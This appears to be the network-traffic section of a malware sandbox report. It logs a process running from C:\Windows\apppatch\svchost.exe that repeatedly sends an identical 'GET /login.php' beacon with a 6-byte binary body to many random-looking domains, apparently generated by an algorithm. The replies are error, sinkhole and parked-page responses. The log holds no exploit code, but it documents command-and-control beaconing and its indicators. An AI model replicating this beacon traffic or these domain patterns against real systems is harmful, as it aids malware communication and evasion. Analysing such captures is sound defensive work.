Aug 23, 2024 18:47:01.589385986 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:01.590604067 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.778620958 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:51.411523104 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.597188950 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:47:51.624247074 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:51.818468094 CEST	689	IN	HTTP/1.1 410 Gone Server: openresty Date: Fri, 23 Aug 2024 16:47:51 GMT Content-Type: text/html Content-Length: 542 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 30 20 47 6f 6e 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 30 20 47 6f 6e 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d [TRUNCATED] Data Ascii: <html><head><title>410 Gone</title></head><body><center><h1>410 Gone</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49736	199.191.50.83	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:00.957045078 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:02.071765900 CEST	758	IN	HTTP/1.1 302 Found Date: Fri, 23 Aug 2024 16:47:01 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=926vr471977221402211128; expires=Wed, 22-Aug-2029 16:47:01 GMT; Max-Age=157680000; path=/; domain=galyqaz.com; HttpOnly Location: //ww3.galyqaz.com Content-Length: 0 Content-Type: text/html; charset=UTF-8
Aug 23, 2024 18:47:51.617531061 CEST	306	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:52.643167973 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 23 Aug 2024 16:47:51 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 38 34 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: a845<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
Aug 23, 2024 18:47:52.643431902 CEST	1236	IN	Data Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f Data Ascii: f(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
Aug 23, 2024 18:47:52.643444061 CEST	1236	IN	Data Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
Aug 23, 2024 18:47:52.644393921 CEST	1236	IN	Data Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72 Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
Aug 23, 2024 18:47:52.644404888 CEST	1236	IN	Data Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
Aug 23, 2024 18:47:52.645529985 CEST	1120	IN	Data Raw: 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 65 6d 70 74 79 2e 68 74 6d 6c 22 7d 61 2e 6e 61 6d 65 3d 62 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 Data Ascii: ing>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(wi
Aug 23, 2024 18:47:52.645540953 CEST	1236	IN	Data Raw: 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 Data Ascii: emoveEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden
Aug 23, 2024 18:47:52.646646976 CEST	1236	IN	Data Raw: 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 Data Ascii: }else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;windo
Aug 23, 2024 18:47:52.646657944 CEST	1236	IN	Data Raw: 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 6f 62 6a 65 63 74 22 26 26 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 Data Ascii: window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"\|\|window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};
Aug 23, 2024 18:47:52.646667004 CEST	672	IN	Data Raw: 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 67 61 6c 79 71 61 7a 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 Data Ascii: ype="text/javascript" src="http://galyqaz.com/px.js?ch=1"></script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.
Aug 23, 2024 18:47:52.647752047 CEST	1236	IN	Data Raw: 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 35 39 31 27 20 62 3d 27 33 33 35 34 39 27 20 63 3d 27 67 61 6c 79 71 61 7a 2e 63 6f 6d 27 20 64 3d 27 65 6e Data Ascii: r){}}</script><meta name="tids" content="a='29591' b='33549' c='galyqaz.com' d='entity_mapped'" /><title>Galyqaz.com</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-widt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	60209	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.003374100 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.518697977 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49651	18.208.156.248	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.170407057 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.728394985 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=ee59b14dfaa9c8907c706ea22e956ef8\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49652	3.94.10.34	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.253634930 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:01.793153048 CEST	409	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:47:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431621\|1724431621\|0\|1\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49653	172.234.222.143	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.356399059 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49655	69.162.80.60	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:47:01.631045103 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:47:02.186418056 CEST	924	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 481 content-type: text/html; charset=utf-8 date: Fri, 23 Aug 2024 16:47:02 GMT server: nginx set-cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88; path=/; domain=.lysyfyj.com; expires=Wed, 10 Sep 2092 20:01:09 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 67 79 4d 69 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 6a 49 79 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 58 49 30 4e 44 46 6f 4d 48 52 68 4d 6e 59 32 59 57 63 77 59 6d 46 6d 4e 44 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 32 4d 6a [TRUNCATED] Data Ascii: <html><head><title>Loading...</title></head><body><script 